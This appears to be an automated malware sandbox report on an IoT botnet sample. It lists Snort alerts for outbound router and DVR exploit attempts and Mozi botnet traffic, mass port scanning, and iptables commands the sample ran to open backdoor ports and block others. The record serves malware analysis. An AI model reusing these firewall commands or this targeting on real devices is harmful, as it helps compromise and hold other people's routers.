                Source: TrafficSnort IDS: 2025884 ET EXPLOIT Multiple CCTV-DVR Vendors RCE 192.168.2.20:56268 -> 115.87.204.89:81
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.84.85: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:35814 -> 35.244.243.215:80
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:41946 -> 45.65.120.55:80
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:33440 -> 23.207.67.88:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:33440 -> 23.207.67.88:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.207.67.88:80 -> 192.168.2.20:33440
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:43164 -> 146.158.12.4:80
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:36034 -> 23.217.112.105:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:36034 -> 23.217.112.105:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.217.112.105:80 -> 192.168.2.20:36034
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:49646 -> 175.234.128.97:8080
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:49646 -> 175.234.128.97:8080
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:50886 -> 44.239.233.229:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:50886 -> 44.239.233.229:80
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.21.200.33: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:41622 -> 13.126.136.27:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:41622 -> 13.126.136.27:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.208.169.116: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 24.89.194.122: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:40490 -> 23.76.236.93:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:40490 -> 23.76.236.93:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.76.236.93:80 -> 192.168.2.20:40490
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 82.135.69.230: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 84.17.32.179: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.126.172.52: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.9.65.166: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.97.108.253: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 190.5.88.118: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 67.204.13.138: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 81.173.167.44: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 212.156.201.116: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.144.72.42: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.105.63.155: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:39386 -> 178.79.174.158:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:39386 -> 178.79.174.158:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.33.211.220: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 120.193.91.233:27697 -> 192.168.2.20:7723
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.94.73:8082 -> 192.168.2.20:7723
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.220.200.185: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:39138 -> 79.171.18.106:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:39138 -> 79.171.18.106:80
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:41018 -> 166.88.243.237:80
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:38600 -> 51.83.246.144:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:38600 -> 51.83.246.144:80
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 116.68.110.157:17793 -> 192.168.2.20:7723
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:43474 -> 166.88.120.253:8080
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:43474 -> 166.88.120.253:8080
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 166.88.120.253:8080 -> 192.168.2.20:43474
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.23.252.43: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:40592 -> 95.8.122.63:8080
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:40592 -> 95.8.122.63:8080
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:45922 -> 104.80.82.152:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:45922 -> 104.80.82.152:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.80.82.152:80 -> 192.168.2.20:45922
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 149.104.34.37: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:36852 -> 157.65.87.141:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:36852 -> 157.65.87.141:80
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 128.233.16.2: -> 192.168.2.20:
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.40.37.31:80 -> 192.168.2.20:40260
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.57.107.2: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 153.126.135.194: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:60106 -> 154.90.79.101:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:60106 -> 154.90.79.101:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.8.127.178: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:42134 -> 23.34.199.82:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:42134 -> 23.34.199.82:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.34.199.82:80 -> 192.168.2.20:42134
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:43048 -> 133.137.248.191:80
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:40260 -> 23.40.37.31:80
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:35178 -> 18.228.54.139:80
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:60998 -> 81.7.8.12:80
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:51938 -> 157.245.223.131:80
                Source: TrafficSnort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.20:44880 -> 183.114.91.82:8080
                Connects to many ports of the same IP (likely port scanning)Show sources
                Source: global trafficTCP traffic: 209.91.20.132 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 179.37.139.184 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 27.20.114.90 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 120.161.181.26 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 16.197.247.12 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 109.31.128.69 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 71.181.75.105 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 4.119.113.119 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 71.163.189.157 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 202.214.128.209 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 99.183.96.40 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 118.206.103.100 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 180.190.249.44 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 175.46.210.102 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 6.86.153.110 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 131.228.7.91 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 111.205.48.104 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 197.124.118.3 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 23.6.254.240 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 94.185.176.145 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 155.201.44.186 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 114.207.0.228 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 87.83.202.29 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 76.213.165.145 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 211.90.22.130 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 114.154.250.15 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 203.160.221.66 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 163.90.78.111 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 189.165.80.3 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 57.163.20.143 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 61.193.135.39 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 128.42.237.138 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 218.182.128.219 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 115.221.72.54 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 67.93.178.237 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 38.139.125.205 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 3.106.131.99 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 27.17.171.210 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 15.51.212.241 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 218.152.25.33 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 96.0.134.167 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 22.30.91.157 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 139.93.154.170 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 164.142.55.184 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 108.113.55.135 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 154.190.122.88 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 71.11.190.90 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 84.48.141.104 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 151.169.69.96 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 159.212.6.68 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 116.221.170.83 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 6.60.84.48 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 178.123.18.214 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 26.80.202.172 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 49.41.213.146 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 2.216.247.11 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 89.179.8.221 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 68.179.189.189 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 94.105.143.222 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 219.143.155.172 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 168.27.245.114 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 191.199.26.110 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 203.63.207.193 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 150.37.72.24 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 25.84.54.191 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 139.49.163.59 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 184.49.220.2 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 131.164.56.28 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 94.18.108.108 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 120.239.0.46 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 36.54.249.217 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 165.16.122.1 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 73.150.235.205 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 2.185.196.129 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 194.203.125.103 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 114.83.134.162 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 57.164.19.75 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 143.157.186.149 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 168.216.111.161 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 130.140.7.168 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 29.161.161.202 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 40.138.247.89 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 80.219.251.133 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 82.109.64.3 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 14.9.89.162 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 220.179.82.16 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 73.2.23.66 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 107.126.27.122 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 75.82.66.140 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 82.6.17.28 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 211.64.237.240 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 114.238.112.196 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 36.184.218.26 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 100.16.3.210 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 123.138.120.67 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 134.67.11.73 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 50.70.173.82 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 193.118.213.59 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 103.148.212.55 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 213.150.115.196 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 165.66.227.31 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 2.96.223.8 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 42.240.2.232 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 104.178.119.156 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 70.132.111.66 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 200.109.140.124 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 31.127.22.163 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 50.192.24.84 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 33.128.39.87 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 184.235.140.0 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 63.119.139.18 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 35.205.25.55 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 121.10.6.126 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 125.246.85.252 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 7.224.163.250 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 62.236.179.84 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 82.248.38.210 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 208.11.186.103 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 161.225.141.251 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 107.206.64.63 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 116.172.79.18 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 55.169.99.112 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 32.56.244.120 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 221.222.213.136 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 178.232.31.216 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 44.66.17.187 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 144.0.182.62 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 143.44.220.86 ports 2,5,6,8,9,52869
                Executes the "iptables" command to insert, remove and/or manipulate rulesShow sources
                Source: /bin/sh (PID: 4637)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44343 -j ACCEPT
                Source: /bin/sh (PID: 4671)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44343 -j ACCEPT
                Source: /bin/sh (PID: 4674)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44343 -j ACCEPT
                Source: /bin/sh (PID: 4715)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44343 -j ACCEPT
                Source: /bin/sh (PID: 4739)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44343 -j ACCEPT
                Source: /bin/sh (PID: 4758)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44343 -j ACCEPT
                Source: /bin/sh (PID: 4776)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44343 -j ACCEPT
                Source: /bin/sh (PID: 4795)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44343 -j ACCEPT
                Source: /bin/sh (PID: 4898)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4915)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4918)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4921)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4949)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4975)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 4999)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 5024)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 5051)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 5077)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5103)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5124)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5128)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5131)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5142)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5167)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5220)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 7723 -j ACCEPT
                Source: /bin/sh (PID: 5223)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 7723 -j ACCEPT
                Source: /bin/sh (PID: 5236)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 7723 -j ACCEPT
                Source: /bin/sh (PID: 5267)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 7723 -j ACCEPT
                Source: /bin/sh (PID: 5295)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 7723 -j ACCEPT
                Source: /bin/sh (PID: 5299)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 7723 -j ACCEPT
                Source: /bin/sh (PID: 5309)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 7723 -j ACCEPT
                Source: /bin/sh (PID: 5337)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 7723 -j ACCEPT
                Uses known network protocols on non-standard portsShow sources
                Source: unknownNetwork traffic detected: HTTP traffic on port 47166 -> 81
                Source: unknownNetwork traffic detected: HTTP traffic on port 42672 -> 5555
                Source: unknownNetwork traffic detected: HTTP traffic on port 56268 -> 81
                Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 56268
                Source: unknownNetwork traffic detected: HTTP traffic on port 53656 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53656 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53656 -> 37215
                Source: global trafficTCP traffic: 192.168.2.20:45402 -> 71.181.75.105:52869
                Source: global trafficTCP traffic: 192.168.2.20:34062 -> 168.27.245.114:49152
                Source: global trafficTCP traffic: 192.168.2.20:42054 -> 87.83.202.29:49152
                Source: global trafficTCP traffic: 192.168.2.20:39772 -> 137.88.31.213:8080
                Source: global trafficTCP traffic: 192.168.2.20:38560 -> 219.143.155.172:37215
                Source: global trafficTCP traffic: 192.168.2.20:37806 -> 24.81.183.180:8080
                Source: global trafficTCP traffic: 192.168.2.20:52474 -> 71.11.190.90:37215
                Source: global trafficTCP traffic: 192.168.2.20:33166 -> 191.250.144.46:8080
                Source: global trafficTCP traffic: 192.168.2.20:57236 -> 37.215.228.246:8080
                Source: global trafficTCP traffic: 192.168.2.20:47640 -> 159.110.183.145:8443
                Source: global trafficTCP traffic: 192.168.2.20:48294 -> 205.51.33.91:8080
                Source: global trafficTCP traffic: 192.168.2.20:49106 -> 103.102.254.14:81
                Source: global trafficTCP traffic: 192.168.2.20:58898 -> 204.189.67.153:81
                Source: global trafficTCP traffic: 192.168.2.20:53486 -> 164.142.55.184:52869
                Source: global trafficTCP traffic: 192.168.2.20:58446 -> 15.51.212.241:52869
                Source: global trafficTCP traffic: 192.168.2.20:33342 -> 7.224.163.250:37215
                Source: global trafficTCP traffic: 192.168.2.20:60706 -> 118.114.67.42:8443
                Source: global trafficTCP traffic: 192.168.2.20:36038 -> 57.163.20.143:37215
                Source: global trafficTCP traffic: 192.168.2.20:44348 -> 193.22.15.210:81
                Source: global trafficTCP traffic: 192.168.2.20:47006 -> 94.185.176.145:49152
                Source: global trafficTCP traffic: 192.168.2.20:40084 -> 36.54.249.217:37215
                Source: global trafficTCP traffic: 192.168.2.20:44420 -> 160.226.225.149:8080
                Source: global trafficTCP traffic: 192.168.2.20:58870 -> 184.235.140.0:49152
                Source: global trafficTCP traffic: 192.168.2.20:46934 -> 130.140.7.168:52869
                Source: global trafficTCP traffic: 192.168.2.20:46600 -> 131.112.27.0:8080
                Source: global trafficTCP traffic: 192.168.2.20:50512 -> 184.49.220.2:49152
                Source: global trafficTCP traffic: 192.168.2.20:41120 -> 166.216.172.210:8080
                Source: global trafficTCP traffic: 192.168.2.20:42878 -> 98.135.167.186:5555
                Source: global trafficTCP traffic: 192.168.2.20:49854 -> 2.99.233.91:8080
                Source: global trafficTCP traffic: 192.168.2.20:51050 -> 50.192.24.84:52869
                Source: global trafficTCP traffic: 192.168.2.20:50412 -> 58.244.219.70:81
                Source: global trafficTCP traffic: 192.168.2.20:32830 -> 7.177.190.112:8080
                Source: global trafficTCP traffic: 192.168.2.20:43784 -> 134.67.11.73:37215
                Source: global trafficTCP traffic: 192.168.2.20:44900 -> 30.115.123.158:8443
                Source: global trafficTCP traffic: 192.168.2.20:60454 -> 51.78.124.189:81
                Source: global trafficTCP traffic: 192.168.2.20:49652 -> 212.212.35.40:8080
                Source: global trafficTCP traffic: 192.168.2.20:35566 -> 32.39.252.126:5555
                Source: global trafficTCP traffic: 192.168.2.20:36226 -> 92.69.32.77:5555
                Source: global trafficTCP traffic: 192.168.2.20:57598 -> 150.135.191.27:8080
                Source: global trafficTCP traffic: 192.168.2.20:54796 -> 89.138.225.184:8080
                Source: global trafficTCP traffic: 192.168.2.20:36964 -> 218.161.66.69:8080
                Source: global trafficTCP traffic: 192.168.2.20:34388 -> 34.89.63.52:7574
                Source: global trafficTCP traffic: 192.168.2.20:36622 -> 37.90.92.11:8080
                Source: global trafficTCP traffic: 192.168.2.20:40676 -> 93.90.210.200:8080
                Source: global trafficTCP traffic: 192.168.2.20:41186 -> 107.126.27.122:49152
